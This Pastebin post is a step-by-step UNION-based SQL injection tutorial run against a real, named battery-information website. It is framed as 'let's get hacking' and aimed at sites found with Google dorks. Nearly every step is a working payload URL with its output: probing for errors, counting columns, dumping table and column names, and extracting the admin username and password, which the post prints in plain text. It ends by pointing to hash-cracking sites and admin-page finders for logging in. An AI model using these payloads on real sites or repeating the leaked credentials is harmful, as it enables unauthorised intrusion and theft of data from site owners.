Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Injection site manually
- הזרקה לאתר באופן ידני
- Hacker zurael sTz
- https://twitter.com/zurael_stz
- Common Types of SQL injection are:
- Code:
- UNION Based SQL injection
- String Based SQL injection
- Error Based SQL injection
- Double Query SQL injection
- Blind SQL injection
- MsSQL injection
- What we are going to learn today is what we call UNION Based SQL injection
- Alright before we start we need to know how a website works while it stores Login information/pages/pictures/etc. in its database
- Lets just say that our website will look like this :
- "http://www.site.com/index.php?id=5"
- Notice at the end of the URL, "id=5"
- This is what the query will look like
- PHP Code:
- SELECT * FROM index
- WHERE id = 5
- Alright, now you know a bit of how the website works, let's get hacking Hehe
- Step1: Finding the vulnerability in a website
- It'll be like a small puzzle you have to solve. See, you can't just hack a website like http://www.site.com -.-
- To hack a website, you need to scan it yourself by clicking links and find out if there's something like "index.php?id=XXX" where "XXX" is a random integer (number) or string (word).
- Alright now to find sites vulnerable to SQLi is using Google Dorks.
- If you don't know how to use dorks, visit Part 1 of this project to learn all about them
- Once you've found a site vulnerable to SQLi, it's time to execute queries.
- For this tutorial, we'll be using "http://www.leadacidbatteryinfo.org" as an example.
- Try browsing the website and see if you can find links like "index.php?id=xxx"
- It can be anything like "details.php?id=xxx" or "gallery.php?id="
- Just find an address with a number at the end of the URL
- Here's what I found "http://www.leadacidbatteryinfo.org/newsdetail.php?id=51"
- Now to test for vulnerabilities is by ADDING a quote " ' " at the end of the url i.e after the integer or string
- So it'll look like this,
- Code:
- http://www.leadacidbatteryinfo.org/newsdetail.php?id=51'
- Now you'll notice an error saying
- Code:
- You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
- Spoiler (Click to View)
- This shows that the website is vulnerable to SQL injection.
- How is this possible?
- Look at the query when we added a quote " ' "
- PHP Code:
- SELECT * FROM article
- WHERE id = 5 '
- Notice that, their database never stored "id = 5 ' "
- This is why they return an error result
- Now that we know the website is vulnerable to SQL injection, let's advance to the next process
- Step2: Finding the number of columns a website has
- This is the part where most people had commonly misunderstood.
- To get to the point, what we're about to do is find how many columns the website has using NoError/Error statements.
- Alright lets get started.
- The query we'll be using is "order by X--" where "X" is a random integer (number)
- Start by entering "order by 25--"
- Enter it at the end of the URL, so it'll look like this
- Code:
- http://www.leadacidbatteryinfo.org/newsdetail.php?id=51 order by 25--
- Error, there are no 25 columns, so it'll be less than 25
- Now lets try "order by 20--"
- Code:
- http://www.leadacidbatteryinfo.org/newsdetail.php?id=51 order by 20--
- Still Error, so there are less than 20 columns
- How about we go down a bit to "order by 5--"
- Code:
- http://www.leadacidbatteryinfo.org/newsdetail.php?id=51 order by 5--
- aha! No errors. So let's see if there are more than 5 columns
- Now lets go up to "order by 11--"
- Code:
- http://www.leadacidbatteryinfo.org/newsdetail.php?id=51 order by 11--
- Hmm, no errors I see. So it's obvious that there could be more than 11 columns
- See if we can increase to "order by 12--"
- Code:
- http://www.leadacidbatteryinfo.org/newsdetail.php?id=51 order by 12--
- Error! So this means the last number that returned no error is 11
- Therefore, the website has 11 columns
- Tips:
- An error while scanning for number of columns will look like this
- Spoiler (Click to View)
- While No errors will show the page as normal Smile
- Step3: Now that we found the number of Columns, time to Execute the UNION SELECT statement
- First off, we need to know what does "UNION SELECT" means
- Lets say we have 2 tables, "users" and "admin"
- Basically, UNION SELECT is a statement where all these information will be collected as one.
- Look at this query
- PHP Code:
- SELECT * FROM users
- UNION SELECT * FROM admin
- If we perform the UNION SELECT statement, we can get both users and admin information from their database
- The point is that, UNION SELECT returns our results with the information we need
- If you want to find vulnerable columns, use UNION SELECT
- If you want to find version of database, UNION SELECT
- If you want admin information! use UNION SELECT Hehe
- Alright, now that we know something about the Union function, lets continue.
- Take our website that has 11 columns and add a "UNION SELECT" statement.
- Here's how our query will look like
- Code:
- http://www.leadacidbatteryinfo.org/newsdetail.php?id=-51 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11--
- This is what you would normally do if you use UNION function while SQL injecting a website
- Focus on something like this, "index.php?id=-X UNION SELECT N--"
- Where "X" is a random integer/string and "N" is the number of columns followed by two hyphens " -- " and another hyphen " - " beside "X"
- Step4: Random numbers appear on screen, the next step
- Alright I'm pretty sure you'll find a bunch of numbers showing up on the screen.
- These are known as "vulnerable columns" which states that those vulnerable columns have stored data inside them we need to extract.
- Here's how it'll look like:
- Spoiler (Click to View)
- You need to inject the number at the very top (always at the very top)
- So, in this case we have number "8"
- Now you might be asking, what can I do with a vulnerable column?
- Well here's what you can get-- INFORMATION!
- You need a lot of information to study from the website, here are a couple of examples.
- Replace the vulnerable column i.e number 8 with a statement
- Statements:
- Code:
- @@version, version()
- database(),
- user(),
- @@hostname
- @@datadir
- Their functions
- @@version/version() = find the version of the database
- database() = find the current database
- user() = find the user information
- @@hostname = Current hosting info
- @@datadir = directory of the data of the website
- To find the version of the database in the website, replace the vulnerable column i.e number 8 with "@@version" or "version()
- It'll look like this
- Code:
- http://www.leadacidbatteryinfo.org/newsdetail.php?id=-51 UNION SELECT 1,2,3,4,5,6,7,@@version,9,10,11--
- Results:
- Code:
- 5.1.52-log
- So the database version is 5, which is good because it'll be easier to SQL inject the website.
- Note:
- Database version less than 5 "<5" = you need to guess tables (a bit hard work)
- Database version greater than 5 ">5" = easy to inject with another function i.e group_concat
- If you ever want to SQLi a website with version <5, then you can guess the tables with the following below
- Code:
- user
- username
- usernames
- admin
- admins
- users
- manager
- account
- accounts
- member
- login
- logins
- members
- tbl_user
- tbl_users
- tbl_admin
- tbl_admins
- tbl_member
- tbl_members
- tbladmins
- memberlist
- tbluser
- tblusers
- tblmanager
- tblmanagers
- tblclients
- tblservers
- adminuser
- usertbl
- userstbl
- admintbl
- adminstbl
- id
- tuser
- tusers
- uid
- userid
- user_id
- auid
- adminpass
- LoginID
- FirstName
- LastName
- cms_user
- cms_member
- cms_users
- cms_members
- cms_admin
- cms_admins
- user_admin
- user_info
- user_list
- user_login
- user_logins
- user_names
- userrights
- userinfo
- userlist
- webadmin
- webadmins
- Webmaster
- Webuser
- product
- products
- tblproducts
- tblproduct
- tbl_tbadmin
- Adminlogin
- We'll be knowing how to get the tables in the next step.
- But for now, let's see what we can get with other statements
- Lets try all statements at once shall we
- The URL will look like this,
- Code:
- http://www.leadacidbatteryinfo.org/newsdetail.php?id=-51 UNION SELECT 1,2,3,4,5,6,7,group_concat(database(),version(),@@datadir,@@hostname,user()),9,10,11--
- Results:
- Code:
- 32908_leadacidbatteryinfoorg5.1.52-log/mnt/cluster/data/mysql1.myregisteredsite.com32908_user116602@lnh-www1h.bluehalo.myregisteredsite.com
- 3
- We have almost every information we have about the website
- Look close here, we used a command "group_concat"
- Here's its function:
- Group_concat = Gets every information at once i.e grouping them with the help of statements. Ex. group_concat(database())
- Note:Group_concat won't work with versions less than 5
- Step5:Getting the table names
- What are tables?
- Tables contain columns and columns contain the data
- It's like a stack (table) of books (columns) and data inside the books (data inside the columns)
- Alright, first lets look up some functions we're gonna use to extract table names (Important)
- Code:
- group_concat = grouping up data to a specific statement
- table_name = tables names to be shown on screen
- from = location of a specified statement
- information_schema.tables = information in the database with table names in it
- table_schema = tables in a database
- database() = current database in the website
- 0x0a = a Hex code that creates a new line for organizing tables in an order
- Now lets combine those functions and make up a query that will give us the table names
- So, here's what our link will look like:
- Code:
- http://www.leadacidbatteryinfo.org/newsdetail.php?id=-51 UNION SELECT 1,2,3,4,5,6,7,group_concat(table_name,0x0a),9,10,11 from information_schema.tables where table_schema=database()--
- In here, we replaced our vulnerable column with "group_concat(table_name,0x0a)"
- and then we added a
- "from information_schema.tables where table_schema=database()--"
- after the last column (excluding the two hyphens after 11)
- Results on table names:
- Code:
- pdigclicks ,pdigengine ,pdigexcludes ,pdigincludes ,pdigkeywords ,pdiglogs ,pdigsite_page ,pdigsites ,pdigspider ,pdigtempspider ,tbladmin ,tblbanner ,tblbanner_page ,tblfaq ,tblncategory ,tblnews
- Spoiler (Click to View)
- Alright now that we've found the tables, what you're gonna have to do is
- that, you have to find tables where user/admin information are stored
- In this case, "tbladmin" seems to be having an admin information stored in it.
- It's all about predicting and expecting what's behind every table you see
- Okay, before proceeding to the next step, make sure you remember the statements we used in order to get the tables.
- Replace and Add the following
- Vulnerable Column = replace with "group_concat(table_name,0x0a)"
- After the last column = Add "from information_schema.tables where table_schema=database()--"
- Also, don't forget about UNION SELECT before the column numbers and the hyphen ( - ) before "X" at index.php?id=X where "X" is a random integer/string
- Step6:Getting Columns from Tables
- Alright obviously, our next task is to get the column names from a specific table which in our case was "tbladmin'
- To do this, we're gonna have to alter some queries a bit
- Now look closely at this syntax:
- Code:
- http://www.leadacidbatteryinfo.org/newsdetail.php?id=-51 UNION SELECT 1,2,3,4,5,6,7,group_concat(column_name,0x0a),9,10,11 from information_schema.columns where table_name=0x74626c61646d696e--
- Here's what we replaced:
- table_name = replaced by "column_name"
- information_schema.tables = replaced by "information_schema.columns"
- table_schema = replaced by "table_name"
- database() = replaced by "0x74626c61646d696e--"
- Now that you know the replacements in our syntax, you still might be wondering what's up with the last part where entered "0x74626c61646d696e--"
- First of all, these are known as Hex
- To make a Hex readable, we put "0x" at the beginning
- I'll explain this briefly. So our table name was "tbladmin"
- To enter that table using the syntax above, we have to convert that table name to Hex
- In order to do that, visit this website:
- http://www.swingnote.com/tools/texttohex.php
- It's a text to hex converter
- Enter "tbladmin" in the text box and hit convert
- You'll notice the results will be "74626c61646d696e" (that's the hex)
- Now to make it readable to the website, add "0x" at the beginning
- So it will be:
- Code:
- 0x74626c61646d696e
- Now you know how Hex works, lets look up some functions we replaced and know their uses (Important)
- Code:
- group_concat(column_name,0x0a) = grouping the column names we're going to extract
- information_schema.columns = column names stored in database
- table_name = extracting column from a specific table
- 0xHEX_Code_Table = Specific table name converted to hex
- Results after extracting column names from tables:
- Code:
- adminid ,username ,password ,dom
- Spoiler (Click to View)
- Now that we've got the columns from that table, it's time to extract the information.
- What we're gonna need here is obviously only the "username" and "password"
- Step7:Getting Data from Columns
- Alright, lets extract the information
- Look closely at the syntax:
- Code:
- http://www.leadacidbatteryinfo.org/newsdetail.php?id=-51 UNION SELECT 1,2,3,4,5,6,7,group_concat(username,0x3a,password,0x0a),9,10,11 from tbladmin--
- Keep this formula-like syntax in your mind whenever you want to extract data from columns
- Code:
- http://www.site.com/index.php?id=-X UNION SELECT N,group_concat("columnName,0x3a,columnName,0x0a) from "tablename"--
- Where "X" is a random integer/string followed by a hyphen ( - ) while "N" is the number/position of the column and "columnName" is the column you want to extract data while "tablename" is where you extract data from a specific table then two hyphens in the end ( -- )
- CONTINUED BELOW
- Now for revising,
- column names = username, password
- separator = 0x3a (a hex for a colon " : ")
- table name = tbladmin
- Once you execute that syntax, you get the username and password separated by a colon
- Results after executing the syntax:
- Code:
- ishir:ishir123
- Username: ishir
- Password: ishir123
- Special cases: Hashed Usernames and Passwords
- Most websites will have their passwords hashed as MD5
- In this case you'll need to crack them.
- Using some websites will help you
- Here's a list of Hash cracking websites:
- Code:
- www.md5decrypter.co.uk/
- www.md5this.com/
- www.md5crack.com/
- http://hashchecker.de/find.html
- An MD5 Hash will look like this:
- Code:
- 21232f297a57a5a743894a0e4a801fc3 -- 32 characters
- A SHA-1 Hash will look like this:
- Code:
- d033e22ae348aeb5660fc2140aec35850c4da997 -- 40 characters
- I'll make up a detailed tutorial on Hash cracking soon.
- But for now, refer to this for a little knowledge about hashes
- http://hackforums.net/showthread.php?tid=1393830
- Credits to Haxor and Insidepro
- Last Step: Finding the admin page and logging in for the goodsDevlish
- Alright, now that we have our admin login info
- Username: ishir
- Password: ishir123
- It's time to find the login pages
- To do this, you can use Admin Page Finders
- Here's some you can use
- >>Scorpion Admin Page Finder<<
- http://sc0rpion.ir/af/
- >>Outlaw Admin Page Finder<<
- http://www.tools.th3-0utl4ws.com/admin-finder/
- >>Napsterakos Admin Page Finder<<
- http://hackforums.net/showthread.php?tid...ight=HaviJ
- >>HaviJ Injector/Cracker and Admin page finder<<
- http://hackforums.net/showthread.php?tid...age+finder
- Alright after scanning the website for admin pages, you should see something like this:
- Code:
- http://www.leadacidbatteryinfo.org/admin/
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement